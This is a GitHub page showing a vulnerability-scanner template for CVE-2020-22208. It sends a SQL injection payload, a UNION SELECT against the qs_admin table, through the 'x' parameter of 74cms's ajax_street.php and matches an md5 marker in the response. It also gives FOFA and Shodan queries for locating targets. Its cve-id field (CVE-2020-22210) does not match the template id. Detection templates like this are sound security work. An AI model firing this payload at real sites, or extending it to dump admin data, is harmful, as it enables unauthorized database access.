-
Notifications
You must be signed in to change notification settings - Fork 222
/
CVE-2020-22208.yaml
36 lines (31 loc) · 941 Bytes
/
CVE-2020-22208.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
id: CVE-2020-22208
info:
name: 74cms - ajax_street.php 'x' SQL Injection
author: ritikchaddha
severity: critical
description: |
SQL Injection in 74cms 3.2.0 via the x parameter to plus/ajax_street.php.
reference:
- https://github.com/blindkey/cve_like/issues/10
- https://nvd.nist.gov/vuln/detail/CVE-2020-22208
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-22210
cwe-id: CWE-89
metadata:
fofa-query: app="74cms"
shodan-query: http.html:"74cms"
tags: cve,cve2020,74cms,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- '{{BaseURL}}/plus/ajax_street.php?act=alphabet&x=11�%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5({{num}}),9%20from%20qs_admin#'
matchers:
- type: word
part: body
words:
- '{{md5({{num}})}}'
# Enhanced by cs on 2022/06/21